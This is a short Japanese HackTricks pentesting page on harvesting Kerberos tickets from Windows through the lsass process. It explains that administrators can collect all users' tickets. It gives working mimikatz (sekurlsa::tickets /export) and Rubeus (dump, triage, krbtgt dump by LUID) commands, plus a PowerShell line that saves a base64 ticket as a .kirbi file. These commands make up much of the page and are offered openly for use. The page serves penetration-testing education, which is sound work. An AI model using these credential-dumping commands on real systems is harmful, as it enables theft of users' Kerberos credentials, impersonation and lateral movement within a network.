hacktricks/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md
2023-07-07 23:42:27 +00:00

4.8 KiB
Raw Blame History

Windowsからチケットを収集する

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Windowsでは、チケットはセキュリティを担当するlsassLocal Security Authority Subsystem Serviceプロセスによって処理および保存されます。したがって、Windowsシステムからチケットを取得するには、lsassと通信して要求する必要があります。非管理者ユーザーの場合、所有しているチケットのみを取得できますが、マシンの管理者の場合は、すべてのチケットを収集できます。この目的のために、以下のようにMimikatzまたはRubeusというツールを使用することができます:

# Using mimikatz
sekurlsa::tickets /export
# Using Rubeus
## Dump all tickets
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

## List all tickets
.\Rubeus.exe triage
## Dump the interesting one by luid
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

この情報は以下から取得されました: https://www.tarlogic.com/en/blog/how-to-attack-kerberos/

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥